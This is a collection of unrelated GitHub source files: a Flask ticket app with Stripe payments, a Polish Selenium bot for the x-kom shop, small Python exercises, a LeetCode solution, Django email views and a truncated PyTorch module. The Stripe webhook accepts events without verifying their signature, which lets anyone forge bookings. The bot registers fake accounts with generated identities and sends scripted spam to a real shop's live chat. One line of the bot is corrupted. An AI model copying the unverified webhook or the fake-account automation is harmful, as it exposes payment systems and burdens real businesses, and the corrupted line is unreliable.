Show.theatre.has(Theatre.name.ilike(f'%{search_query}%')),\n Show.theatre.has(Theatre.place.ilike(f'%{search_query}%')),\n )\n ).all()\n\n shows_data = []\n for show in shows:\n shows_data.append({\n 'id': show.id,\n 'name': show.name,\n 'rating': show.rating,\n 'tags': show.tags,\n 'ticket_price': show.ticket_price,\n 'theatre_id': show.theatre_id,\n 'start_time': show.start_time,\n 'end_time': show.end_time,\n 'date': show.date,\n 'trailer_url': show.trailer_url,\n 'poster': show.poster,\n 'available_seats': show.available_seats\n })\n\n search_results_json = jsonify(shows_data)\n redis_client.setex('search_results',10,search_results_json.data)\n\n return jsonify(shows_data), 200\n\n\n@show_management.route(\"/api/checkout\", methods=[\"POST\"])\ndef stripeCheckout():\n data = request.get_json()\n user_id = data.get('user_id')\n show_name = data.get('show_name')\n ticket_price = str(round(data.get('ticket_price')*100,2))\n num_tickets = data.get('num_tickets')\n show_id = data.get('show_id')\n\n \n session = stripe.checkout.Session.create(\n payment_method_types=['card'],\n line_items=[{\n 'price_data': {\n 'unit_amount_decimal': ticket_price,\n 'currency': 'usd',\n 'product_data': {\n 'name': show_name\n },\n },\n 'quantity': num_tickets,\n },\n ],\n mode='payment',\n success_url='http://localhost:8080/booking-success',\n cancel_url='http://localhost:8080/booking-failed',\n metadata={\n 'user_id':user_id,\n 'show_name':show_name,\n 'ticket_price':ticket_price,\n 'num_tickets':num_tickets,\n 'show_id':show_id\n }\n )\n return jsonify({\"sessionId\":session['id'],\"metadata\":session.metadata}),200\n\n# Endpoint to handle Stripe webhook events\n@show_management.route(\"/api/webhooks/stripe\", methods=[\"POST\"])\ndef handle_stripe_webhook():\n payload = request.data\n event = None\n\n try:\n event = stripe.Event.construct_from(\n json.loads(payload), stripe.api_key\n )\n except ValueError as e:\n return jsonify({\"error\": \"Invalid payload\"}), 400\n\n if event.type == \"checkout.session.completed\":\n # A payment has been successfully completed\n session = event.data.object\n user_id = int(session.metadata.get(\"user_id\"))\n show_id = int(session.metadata.get(\"show_id\"))\n num_tickets = int(session.metadata.get(\"num_tickets\"))\n\n # Create the booking and update available_tickets\n create_and_update_booking(user_id, show_id, num_tickets)\n\n return jsonify({\"status\": \"success\"}), 200\n\ndef create_and_update_booking(user_id, show_id, num_tickets):\n try:\n booking = Booking(user_id=user_id, show_id=show_id, num_tickets=num_tickets, date_of_booking=date.today())\n db.session.add(booking)\n\n show = Show.query.get(show_id)\n show.available_seats -= num_tickets\n\n db.session.commit()\n\n except Exception as e:\n db.session.rollback()","repo_name":"suyamoonpathak/ShowScape---A-Ticket-Management-Vue-Flask-App","sub_path":"backend/show_management.py","file_name":"show_management.py","file_ext":"py","file_size_in_byte":11913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40273298002","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom data.personal import CreatePerson\nfrom selenium.webdriver.common.by import By\nimport time\nfrom bs4 import BeautifulSoup\n\n\n\n\n\nclass XKom:\n \"\"\"Długo szukałem strony gdzie można wykonac jakieś logowanie (z 'rejestracja') bez problemu\"\"\"\n\n def __init__(self, email_instance_user):\n self.email_instance_user = email_instance_user\n\n def all_in_class(self):\n XKom.register(self)\n time.sleep(10)\n XKom.add_to_cart(self)\n XKom.fill_data_in_cart(self)\n\n def start_convert(self):\n global browser\n browser = webdriver.Chrome(ChromeDriverManager().install())\n browser.implicitly_wait(10)\n browser.get(\"https://www.x-kom.pl\")\n browser.maximize_window()\n time.sleep(4)\n # browser.find_element(By.XPATH, \"//div[@id='react-portals']/div[4]/div/div[@role='dialog']//button[.='W \"\n # \"porządku']\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//div[@role='dialog']//button[.='W porządku']\").click()\n time.sleep(2)\n XKom.conversation(self)\n\n def register(self):\n \"\"\"Wystarczy nam sam ChromeDriverManager z install, zapewne każdy korzysta lub ma przeglądarkę Google Chrome\n W przypadku przykładu - nie chcę wrzucać na gita plików .exe (chromedriver.exe)\n\n Od wersji 4.0 (jakoś po nowym roku) nie można już używać klasycznego find_element_by_class_name ;_;\"\"\"\n\n global browser\n browser = webdriver.Chrome(ChromeDriverManager().install())\n browser.implicitly_wait(10)\n browser.get(\"https://www.x-kom.pl\")\n browser.maximize_window()\n time.sleep(3)\n\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//div[@role='dialog']//button[.='W porządku']\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[1]/header/div[1]/div[4]/div/div[2]/div/div[\"\n \"1]/a[@href='/konto']\").click()\n browser.find_element(By.XPATH, \"//div[@id='app']/div/div[1]/div/div[2]//a[@href='/rejestracja']\").click()\n time.sleep(3)\n browser.find_element(By.NAME, \"firstName\").send_keys(CreatePerson.first_name())\n browser.find_element(By.NAME, \"lastName\").send_keys(CreatePerson.last_name())\n browser.find_element(By.NAME, \"email\").send_keys(self.email_instance_user)\n browser.find_element(By.NAME, \"password\").send_keys(CreatePerson.password())\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div/div[1]/div/div[1]//form//div[@class='ldtoi0-6 \"\n \"loocTj']\").click()\n browser.find_element(By.XPATH, \"//div[@id='app']/div/div[1]/div/div[1]//form//button[@type='submit']/span[\"\n \".='Załóż konto']\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[1]//a[@title='x-kom.pl']/span[1]/img[@alt='x-kom - \"\n \"Sklep komputerowy']\").click()\n\n def add_to_cart(self):\n \"\"\"Nie posiadam na tn moment serwera pocztowego więc zademonstruje jak na razie poruszanie się po sklepie\"\"\"\n \"\"\"Proszę za mną\"\"\"\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[1]//nav/ul/li[4]/a[@role='menuitem']/div[\"\n \".='Podzespoły komputerowe']\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[2]/div[2]/div[2]/div[2]/div[2]/div[4]/a[\"\n \"@href='/g-5/c/345-karty-graficzne.html']//img[@alt='Karty graficzne']\").click()\n time.sleep(2)\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[2]/div[4]/div[2]/div[1]/div[1]/div/div/div/div/div[\"\n \"1]/div/div/div\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[2]/div/div[1]/div[3]/div[2]//button[@title='Dodaj do koszyka']\").click()\n time.sleep(3)\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//div[@role='dialog']//a[@href='/koszyk']\").click()\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div[2]/div[1]/div[2]/div/div[1]/div[2]/div[3]/button\").click()\n\n def fill_data_in_cart(self):\n \"\"\"Wypełnimy jakieś dane, zobaczymy co się wydarzy\"\"\"\n browser.find_element(By.NAME, \"recipientName\").send_keys(CreatePerson.first_name() + \" \" + CreatePerson.last_name())\n browser.find_element(By.NAME, \"recipientStreet\").send_keys(CreatePerson.street() + \" \" + CreatePerson.house_number())\n browser.find_element(By.NAME, \"recipientPostalCode\").send_keys(CreatePerson.postal_code())\n browser.find_element(By.NAME, \"recipientCity\").send_keys(CreatePerson.city())\n browser.find_element(By.NAME, \"recipientEmail\").send_keys(self.email_instance_user)\n browser.find_element(By.NAME, \"recipientPhoneNumber\").send_keys(CreatePerson.phone())\n time.sleep(1)\n \"\"\"Przechodzimy do podsumowania\"\"\"\n\n \"\"\"X-Kom to react, co się objawia problemem z klikaniem kluczowych przcisków\"\"\"\n \"\"\"W taki sposób szukam rozwiązania\"\"\"\n aaa = browser.find_elements(By.XPATH, \"/html//div[@id='app']/div//form/div/div[3]/div/div[1]/div[4]/div[4]/button\")\n bbb = browser.find_elements(By.CSS_SELECTOR, \"[class='sc-15ih3hi-0 pvj85d-4 cCPDSX']\")\n ccc = browser.find_elements(By.CSS_SELECTOR, \".cCPDSX.pvj85d-4.sc-15ih3hi-0\")\n\n print(len(aaa))\n print(len(bbb)) # to printuje te jedynki\n print(len(ccc))\n\n \"\"\"Jest tyle opcji wyboru ponieważ nie zawsze działa jeden sposób ;_;\"\"\"\n if len(aaa) > 0:\n browser.find_element(By.XPATH, \"/html//div[@id='app']/div//form/div/div[3]/div/div[1]/div[4]/div[4]/button\").click()\n return\n elif len(bbb) > 0:\n browser.find_element(By.CSS_SELECTOR, \"[class='sc-15ih3hi-0 pvj85d-4 cCPDSX']\").click()\n return\n elif len(ccc) > 0:\n browser.find_element(By.CSS_SELECTOR, \".cCPDSX.pvj85d-4.sc-15ih3hi-0\").click()\n\n def conversation(self):\n \"\"\"Moduł ten będzie prowadził rozmowę z konsultantem z x-kom'a\n Nie wiem czy to zadziała, pisze komentarz przed napisaniem kodu :O\n Ale mam ochotę dla prezentaji napisać banalnego bota\n Który wciśnie konsultantowi fotowoltaikę\n\n pro edit: myslę, że na potrzeby tego modułu zrobię osobny start dla rozmowy\n Będzie to moduł: start_convert\n Będzie w nim otwieranie przegladarki (instalacja drivera - max_window i inne)\n I od razu przejście do tego modułu\n Aby nie przechodzić całego procesu w klasie\"\"\"\n\n \"\"\"Zaczniemy od otwarcia komówrki z dymkiem\"\"\"\n browser.find_element(By.XPATH, \"//div[@id='react-portals']//button\").click()\n time.sleep(2)\n\n \"\"\"Teraz musimy znaleźć pole tekstowe i wprowadzić do niego wyrazy\n nalepiej zapisać to jako zmienna i się później odnosić do tego jako inputText\"\"\"\n \"\"\"test\"\"\"\n print(\"Zaczynamy odpytywnaie\")\n some_text = [\"Jesteś 2 w kolejce\",\n \"Niedługo połączy się z Tobą doradca.\"]\n boologic = False\n lenght = 0\n welcome = 0\n looking_for = 0 # kiedys się przydasz\n name = \"\"\n wait = 0\n priv_ask = 0\n while boologic != True:\n table = []\n print(f\"Zerujemu tablicę = {len(table)}\")\n print(f\"Nasza długość length wynosi = {lenght}\")\n\n \"\"\"Plan jest taki aby olać asynchroniczne moduły wraz z wbudowaną komendą od selenium\n W pętli while odpytujemy non stop stronę, xkom dodaje nowe pliki div i span z podobną klasą\n liczymy ile jest na stronie, kazda odpowiedź konsultanta to dodatkowy div/span\n Jeżeli zostanie wykryty > od poprzedniej puli to analizujemy tekst\"\"\"\n\n \"\"\"Pobieramy całą stronę\"\"\"\n content = browser.page_source\n \"\"\"content będzie naszym requestem aby nie rzucać tak ciastkami za pomocą requests\"\"\"\n\n bs41 = BeautifulSoup(content, \"lxml\")\n bs44 = bs41.body.find_all('span', {\"class\": \"sc-154u2ib-4 cDszJB\"})\n \"\"\"Jak się okazało istnieje tag span gdzie klasa ma zawsze taką samą nazwę i występuje tylko w tym chacie\"\"\"\n # syntax = re.findall(\"^[sc-154u2ib-3] lenght and len(table) != 0:\n if lenght < len(table):\n \"\"\"Musimy to tutaj zrównać, inaczej nie ma jak dodać tego do lenght a nasz główny if zawsze będzie sie wykonywał\"\"\"\n lenght = 0\n lenght += len(table)\n\n if welcome == 0:\n newtext[0].send_keys(\"Witam, mam pytanie dotyczące sprzętu, czy jestem połączony z konsultantem?\")\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n \"\"\"Ustalamy że welcome już nie będzie równe zero aby ponownie nie wpaść do warunku\"\"\"\n welcome += 1\n \"\"\"Ustalamy pierwszą długość tablicy , każda nowa wiadomość to kolejny element\"\"\"\n lenght += 1\n print(f\"dodalismy do lenght 1 = {len(table)}\")\n\n \"\"\"Powstaje wyjątek, czasem mogę być któryś w kolejce, element nie będzie 3 tylko 5\"\"\"\n if name == \"\":\n if some_text[0] in table or some_text[1] in table:\n if len(table) >= 4:\n \"\"\"Tutaj wyciągniemy z chatu imię konsultanta\n Jest to zwykle 3 element tablicy table, imię jest na końcu\"\"\"\n name = table[4][27:]\n print(f\"Pobrano imię konsultanta - {name}\")\n wait += 1\n else:\n if len(table) == 3:\n \"\"\"Tutaj wyciągniemy z chatu imię konsultanta\n Jest to zwykle 3 element tablicy table, imię jest na końcu\n Ten else jest na wypadek kiedy bedę któryś w kolejce\"\"\"\n name = table[2][27:]\n print(f\"Pobrano imię konsultanta - {name}\")\n\n if name != \"\":\n if wait == 1:\n if len(table) == 6:\n print(\"Wysyłamy pierwsze zapytanie o falownik do fotowoltaiki :)\")\n newtext[0].send_keys(f\"Cześć {name}, czy macie może w ofercie falowniki do fotowoltaiki?\")\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n lenght += 1\n if wait == 0:\n if len(table) == 4:\n print(\"Wysyłamy pierwsze zapytanie o falownik do fotowoltaiki :)\")\n newtext[0].send_keys(f\"Cześć {name}, czy macie może w ofercie falowniki do fotowoltaiki?\")\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n lenght += 1\n\n if priv_ask == 0:\n if wait == 1:\n if len(table) >= 7:\n print(\"Wysyłamy drugie zapytanie o falownik do fotowoltaiki :)\")\n newtext[0].send_keys(f\"{name} a może sam szukasz godnego polecenia sprzętu do odbioru energii ze słońca?\"\n f\"Chyba możemy się dogadać - dobrze, że się znaleźliśmy :D \")\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n lenght += 1\n if wait == 0:\n if len(table) >= 6:\n print(\"Wysyłamy drugie zapytanie o falownik do fotowoltaiki :)\")\n newtext[0].send_keys(\n f\"{name} a może sam szukasz godnego polecenia sprzętu do odbioru energii ze słońca?\"\n f\"Chyba możemy się dogadać - dobrze, że się znaleźliśmy :D \")\n browser.find_element(By.XPATH, \"/html//div[@id='react-portals']//form/button\").click()\n lenght += 1\n\n \"\"\"Więcej nie będę rozpisywał żeby mi nie zablokowali IP albo wrzucili ma black_list\"\"\"\n \"\"'Za pomocą ifów można to rozbudowywać, lub napisa pod to klasę, jeżeli ktoś chce stworzyć ' \\\n 'poważny system relacji z konsultantem'\n \"\"\"Ja robiłem to dla zabawy więc za pomocą ifów chciałem pokazać tylko żę się da\"\"\"\n time.sleep(5)\n time.sleep(5)\n \"\"\"To jest teraz bardzo ważne, tablica table będzie zerowana co cykl pętli while, natomiast zminna \n lenght musi trzymac poprzednią wartość ilości elementów \"\"\"\n\n","repo_name":"ForAttention/GenZERO","sub_path":"data/xkom.py","file_name":"xkom.py","file_ext":"py","file_size_in_byte":14047,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36826628031","text":"def leiaInt(str):\n while True:\n num = input(str)\n if num.isnumeric():\n return int(num)\n print('\\033[31mValor Inválido!\\033[m')\n\n\nn = leiaInt('Digite um número : ')\nprint(f'Você digitou o número {n}')","repo_name":"CaNeoN28/MyPython","sub_path":"pythonExercicios/funções/ex104.py","file_name":"ex104.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32612568138","text":"listaAlunos = []\nwhile True:\n nome = (input('Nome: ').capitalize().strip())\n nota1 = (float(input('Nota 1: ')))\n nota2 = (float(input('Nota 2: ')))\n media = (nota1 + nota2) / 2\n listaAlunos.append([nome, [nota1, nota2], media])\n opcao = input('Deseja continuar [S/N]? ').upper().strip()[0]\n if 'N' in opcao:\n break\nprint('-='*30)\nprint(f'{\"No.\":5}{\"NOME\"}{\"MÉDIA\":>15}')\nprint('-'*30)\nfor i, a in enumerate(listaAlunos):\n print(f'{i:<5}{a[0]:16}{a[2]:.1f}')\nprint('-'*30)\nwhile True:\n aluno = int(input('Mostrar notas de qual aluno [999 interrompe]? '))\n if aluno == 999:\n break\n elif aluno <= len(listaAlunos) - 1:\n print(f'Notas de {listaAlunos[aluno][0]} são {listaAlunos[aluno][1]}')\n else:\n print('No. inválido tente novamente!')\nprint('FINALIZANDO...')\nprint('<<<< VOLTE SEMPRE >>>>')\n","repo_name":"danoliveiradev/PythonExercicios","sub_path":"ex089.py","file_name":"ex089.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40051052983","text":"##############################################################################\n# TITLE: Image Test\n# DESCRIPTION: Down-convert color range from full color to 8 colors\n# VERSION: 1.1\n# VERSION NOTES:\n# Added show image at end at set file locations as variables\n# AUTHOR: Kenny Haynie\n##############################################################################\n\nfrom PIL import Image\nfrom datetime import datetime\n\ntestImageLocation='TestImages/test-lola.jpg'\nsaveLocation='Output/imageRGBredux'\n\n# Load Image\nim=Image.open(testImageLocation)\npix=im.load()\nprint(im.size)\n\n# Reduce image colors to 8 colors\nfor x in range(0, im.size[0]-1):\n for y in range(0, im.size[1]-1):\n r,g,b=pix[x,y]\n if r > 122:\n r0=255\n else:\n r0=0\n if g > 122:\n g0=255;\n else:\n g0=0\n if b > 122:\n b0=255\n else:\n b0=0\n pix[x,y]=(r0,g0,b0)\n\n# Save Image\nnow=datetime.now()\nfilename=str(saveLocation) + '_' + now.strftime(\"%Y%m%d%H%M%S\")+'.jpg'\nim.save(filename)\nim.show()\n","repo_name":"doctriam/python","sub_path":"ImageProcessing/BasicColorReduction.py","file_name":"BasicColorReduction.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1605306675","text":"from setuptools import setup, find_packages\nimport os\n\ndef parse_requirements(req_file):\n with open(req_file) as fp:\n _requires = fp.read()\n return _requires\n\n\nNAME = \"panoptic\"\nVERSION = \"0.1.1.dev3\"\n# Get dependencies from requirement files\nSETUP_REQUIRES = ['setuptools', 'setuptools-git', 'wheel']\nINSTALL_REQUIRES = parse_requirements('requirements.txt')\nLONG_DESCRIPTION = \"\"\n\nwith open(os.path.join(os.path.dirname(__file__), 'description.md'), 'r') as f:\n LONG_DESCRIPTION = f.read()\n\ndef setup_package():\n metadata = dict(name=NAME,\n version=VERSION,\n licence='MPL-2.0 license',\n install_requires=INSTALL_REQUIRES,\n long_description=LONG_DESCRIPTION,\n long_description_content_type='text/markdown',\n setup_requires=SETUP_REQUIRES,\n entry_points={\n 'console_scripts':[\n 'panoptic = panoptic.main:start'\n ]\n },\n # include_package_data=True,\n # package_dir=\"panoptic/html\",\n package_data={\n \"\": ['html/*', 'html/assets/*', 'scripts/create_db.sql'],\n },\n packages=find_packages())\n\n setup(**metadata)\n\n\ndef _copy_html_data(directory):\n base_dir = os.path.join('', directory)\n for (dirpath, dirnames, files) in os.walk(base_dir):\n for f in files:\n yield os.path.join(dirpath.split('/', 1)[1], f)\n\nif __name__ == \"__main__\":\n setup_package()","repo_name":"CERES-Sorbonne/Panoptic","sub_path":"panoptic_back/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11628588211","text":"#\n# @lc app=leetcode id=127 lang=python3\n#\n# [127] Word Ladder\n#\n\n# @lc code=start\nfrom collections import deque\n#NOTE: our Algo will be like that It's like a graph and we will do BFS on it \n'''\n hit (level 1)\n |\n ---------------\n | | | |\n hot git hat hxt (level 2)\n | | | |\n dot git dat dxt (level 3)\n | | |\n dog dag dxt (level 4)\n |\n cog (level 5)\n\n\n\nBreadth-First Search (BFS) Approach:\nBFS is an algorithm used for traversing or searching tree or graph data structures. In this problem, BFS helps us efficiently find the shortest transformation sequence from the start word to the target word.\n\nBFS Algorithm:\n\nStart from the beginWord and add it to the queue along with its initial level, which is 1.\n\nWhile the queue is not empty, do the following:\na. Pop the front element (current word) and its level from the queue.\nb. Check if the current word is equal to the endWord. If it is, we have found the target word, and we can return the current level as the result.\nc. For each character in the current word, try all possible transformations by replacing it with all lowercase alphabets ('a' to 'z').\nd. If the new word (formed by the transformation) is in the word list, it means it is a valid word. Remove it from the word list to mark it as visited and avoid revisiting it.\ne. Add the new word and the incremented level to the queue for further exploration in the next BFS level.\nf. Continue the BFS traversal until either the endWord is found (in which case we return the level) or there are no more words left in the queue to explore.\ng. If we exhaust all possible transformations and cannot reach the endWord, we return 0, indicating that it is impossible to reach the target word.\n\nNow, let's examine the code for the BFS solution:\n\npython\nCopy code\nfrom collections import deque\n\ndef ladderLength(beginWord, endWord, wordList):\n if endWord not in wordList:\n return 0\n\n wordSet = set(wordList)\n queue = deque([(beginWord, 1)])\n\n while queue:\n current_word, level = queue.popleft()\n\n if current_word == endWord:\n return level\n\n for i in range(len(current_word)):\n for char in 'abcdefghijklmnopqrstuvwxyz':\n new_word = current_word[:i] + char + current_word[i+1:]\n if new_word in wordSet:\n wordSet.remove(new_word)\n queue.append((new_word, level + 1))\n\n return 0\nExplanation of the Code:\n\nThe function ladderLength(beginWord, endWord, wordList) takes the beginWord and endWord as the start and target words, respectively, and wordList as a list of words in the dictionary.\n\nIf the endWord is not in the wordList, it is impossible to reach the target word, so the function returns 0.\n\nWe create a wordSet to store the words in the wordList for efficient lookup during BFS. This helps us quickly check if a word is in the dictionary and if it has been visited.\n\nWe use a queue to perform BFS traversal. Each element in the queue is a tuple containing the current word and the level (number of transformations) it is at.\n\nWe add the beginWord to the queue with an initial level of 1.\n\nWhile the queue is not empty, we pop the front element (current word) and its level from the queue.\n\nWe check if the current word is equal to the endWord. If it is, we have found the target word, so we return the current level as the result.\n\nFor each character in the current word, we try all possible transformations by replacing it with all lowercase alphabets ('a' to 'z').\n\nIf the new word (formed by the transformation) is in the wordSet, it means it is a valid word in the dictionary. We remove it from the wordSet to mark it as visited and avoid revisiting it.\n\nWe add the new word and the incremented level to the queue for further exploration in the next BFS level.\n\nThe BFS traversal continues until either the endWord is found (in which case we return the level) or there are no more words left in the queue to explore.\n\nIf we exhaust all possible transformations and cannot reach the endWord, we return 0, indicating that it is impossible to reach the target word.\n\nExample:\nLet's use the example we discussed earlier to illustrate how the BFS algorithm works:\n\nmakefile\nCopy code\nwordList = [\"hot\", \"dot\", \"dog\", \"lot\", \"log\", \"cog\"]\nbeginWord = \"hit\"\nendWord = \"cog\"\nInitially, the queue contains the tuple (\"hit\", 1) with the level set to 1.\n\nPop the front element (\"hit\", 1) from the queue.\nTry all possible transformations of \"hit\": \"ait\", \"bit\", ..., \"zit\", \"hat\", \"hbt\", ..., \"hzt.\"\nSince \"hot\" and \"hat\" are valid words, add them to the queue with their respective levels: (\"hot\", 2) and (\"hat\", 2).\nThe queue now contains two elements: (\"hot\", 2) and (\"hat\", 2).\nPop the front element (\"hot\", 2) from the queue.\nTry all possible transformations of \"hot\": \"aot\", \"bot\", ..., \"zot\", \"hot\", \"hob\", ..., \"hoz.\"\nSince \"dot\" is a valid word, add it to the queue with its level: (\"dot\", 3).\nThe queue now contains one element: (\"hat\", 2) and (\"dot\", 3).\nContinue the BFS traversal, exploring all possible transformations and adding valid words to the queue.\nEventually, we find the endWord \"cog\" at level 5, and we return the level 5 as the minimum number of transformations required to reach the target word.\nIn this example, the shortest transformation sequence is \"hit\" -> \"hot\" -> \"dot\" -> \"dog\" -> \"cog\" with 5 transformations.\n\nThe BFS approach efficiently finds the shortest transformation sequence by exploring nodes in the same level before moving to the next level, making it the preferred approach for this problem.\n'''\nclass Solution:\n def ladderLength(self,beginWord, endWord, wordList):\n # If the endWord is not in the wordList, it is impossible to reach the target word\n if endWord not in wordList:\n return 0\n\n # Convert the wordList to a set for faster lookup\n wordSet = set(wordList)\n\n # Create a queue for BFS traversal. Each element in the queue is a tuple containing the current word and its level.\n queue = deque([(beginWord, 1)])\n\n while queue:\n # Pop the front element (current word) and its level from the queue\n current_word, level = queue.popleft()\n\n # If the current word is equal to the endWord, we have found the target word\n if current_word == endWord:\n return level\n\n # Try all possible transformations of the current word by replacing each character with 'a' to 'z'\n for i in range(len(current_word)):\n for char in 'abcdefghijklmnopqrstuvwxyz':\n # Form a new word by replacing the character at index 'i' with 'char'\n new_word = current_word[:i] + char + current_word[i+1:]\n\n # If the new word is in the wordSet (valid word in the dictionary), we remove it from the wordSet to mark it as visited\n if new_word in wordSet:\n wordSet.remove(new_word)\n\n # Add the new word and the incremented level to the queue for further exploration in the next BFS level\n queue.append((new_word, level + 1))\n\n # If we exhaust all possible transformations and cannot reach the endWord, return 0 (impossible to reach the target word)\n return 0 \n# @lc code=end\n\n","repo_name":"AyushKumar1810/.leetcode","sub_path":"127.word-ladder.py","file_name":"127.word-ladder.py","file_ext":"py","file_size_in_byte":7402,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"3124419608","text":"from django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.http import JsonResponse\nfrom django.template import loader\nfrom django.views import generic\n\nfrom .forms import CallbackForm, FeedbackForm\n\n__all__ = ['EmailFormData', 'RequestCallback', 'RequestFeedback']\n\n\nclass EmailFormData(generic.CreateView):\n \"\"\"\n Base class for views sending form-based emails.\n\n Meant to be subclassed. The child classes are required to set\n `email_recipients`, `email_subject_template`, `email_template_html` and\n `email_template_plain` class attributes.\n\n The `form_valid()` method should be extended to set `email_context`\n attribute. Its value is passed to the email templates as the context.\n \"\"\"\n http_method_names = [\"post\"]\n email_from = settings.EMAIL_HOST_USER\n email_recipients = []\n email_context = {}\n email_subject_template = ''\n email_template_html = ''\n email_template_plain = ''\n\n def form_invalid(self, form):\n return JsonResponse(\n {\"ok\": False, \"errors\": form.errors},\n status=400,\n )\n\n def form_valid(self, form):\n context = self.email_context\n\n email_subject = loader.get_template(\n self.email_subject_template\n ).render(context)\n\n email_plain = loader.get_template(\n self.email_template_plain\n ).render(context)\n\n email_html = loader.get_template(\n self.email_template_html\n ).render(context)\n\n delivered_msg_count = send_mail(\n from_email=self.email_from,\n recipient_list=self.email_recipients,\n subject=email_subject,\n message=email_plain,\n html_message=email_html,\n )\n if delivered_msg_count == 0:\n return JsonResponse(\n {\"ok\": False,\n \"errors\": [\"Email notification was not delivered\"]},\n status=500,\n )\n return JsonResponse({\"ok\": True})\n\n\nclass RequestCallback(EmailFormData):\n \"\"\"\n Email a call-back request.\n \"\"\"\n form_class = CallbackForm\n email_recipients = settings.CALLBACK_REQUEST_RECIPIENTS\n email_subject_template = 'contacts/callback_alert_subject.txt'\n email_template_plain = 'contacts/callback_alert.txt'\n email_template_html = 'contacts/callback_alert.html'\n\n def form_valid(self, form):\n form.save()\n self.email_context = {\n 'name': form.cleaned_data['name'],\n 'phone': form.cleaned_data['phone'],\n 'comment': form.cleaned_data['comment'],\n 'site': self.request.site,\n }\n return super().form_valid(form)\n\n\nclass RequestFeedback(EmailFormData):\n \"\"\"\n Email a feedback message.\n \"\"\"\n form_class = FeedbackForm\n email_recipients = settings.FEEDBACK_REQUEST_RECIPIENTS\n email_subject_template = 'contacts/feedback_alert_subject.txt'\n email_template_plain = 'contacts/feedback_alert.txt'\n email_template_html = 'contacts/feedback_alert.html'\n\n def form_valid(self, form):\n form.save()\n msg_type = form.cleaned_data['msg_type']\n self.email_context = {\n 'msg_type': form.instance.MsgTypes(msg_type).label,\n 'msg': form.cleaned_data['msg'],\n 'email': form.cleaned_data['email'],\n 'name': form.cleaned_data['name'],\n 'site': self.request.site,\n }\n return super().form_valid(form)","repo_name":"nevimov/otkaz","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8307430907","text":"import torch\nimport torch.nn as nn\nfrom models.utils import get_knn_pts, index_points\nfrom einops import repeat, rearrange\nfrom models.pointops.functions import pointops\n\n\nclass Point3DConv(nn.Module):\n def __init__(self, args):\n super(Point3DConv, self).__init__()\n\n self.k = args.k\n self.args = args\n self.conv_delta = nn.Sequential(\n nn.Conv2d(3, args.growth_rate, 1),\n nn.BatchNorm2d(args.growth_rate),\n nn.ReLU(inplace=True)\n )\n self.conv_feats = nn.Sequential(\n nn.Conv2d(args.bn_size * args.growth_rate, args.growth_rate, 1),\n nn.BatchNorm2d(args.growth_rate),\n nn.ReLU(inplace=True)\n )\n self.post_conv = nn.Sequential(\n nn.Conv2d(args.growth_rate, args.growth_rate, 1),\n nn.BatchNorm2d(args.growth_rate),\n nn.ReLU(inplace=True)\n )\n\n def forward(self, feats, pts, knn_idx=None):\n # input: (b, c, n)\n\n if knn_idx == None:\n # (b, 3, n, k), (b, n, k)\n knn_pts, knn_idx = get_knn_pts(self.k, pts, pts, return_idx=True)\n else:\n knn_pts = index_points(pts, knn_idx)\n # (b, 3, n, k)\n knn_delta = knn_pts - pts[..., None]\n # (b, c, n, k)\n knn_delta = self.conv_delta(knn_delta)\n # (b, c, n, k)\n knn_feats = index_points(feats, knn_idx)\n # (b, c, n, k)\n knn_feats = self.conv_feats(knn_feats)\n # multiply: (b, c, n, k)\n new_feats = knn_delta * knn_feats\n # (b, c, n, k)\n new_feats = self.post_conv(new_feats)\n # sum: (b, c, n)\n new_feats = new_feats.sum(dim=-1)\n return new_feats\n\n\nclass DenseLayer(nn.Module):\n def __init__(self, args, input_dim):\n super(DenseLayer, self).__init__()\n\n self.conv_bottle = nn.Sequential(\n nn.Conv1d(input_dim, args.bn_size * args.growth_rate, 1),\n nn.BatchNorm1d(args.bn_size * args.growth_rate),\n nn.ReLU(inplace=True)\n )\n self.point_conv = Point3DConv(args)\n\n def forward(self, feats, pts, knn_idx=None):\n # input: (b, c, n)\n\n new_feats = self.conv_bottle(feats)\n # (b, c, n)\n new_feats = self.point_conv(new_feats, pts, knn_idx)\n # concat\n return torch.cat((feats, new_feats), dim=1)\n\n\nclass DenseUnit(nn.Module):\n def __init__(self, args):\n super(DenseUnit, self).__init__()\n\n self.dense_layers = nn.ModuleList([])\n for i in range(args.layer_num):\n self.dense_layers.append(DenseLayer(args, args.feat_dim + i * args.growth_rate))\n\n def forward(self, feats, pts, knn_idx=None):\n # input: (b, c, n)\n\n for dense_layer in self.dense_layers:\n new_feats = 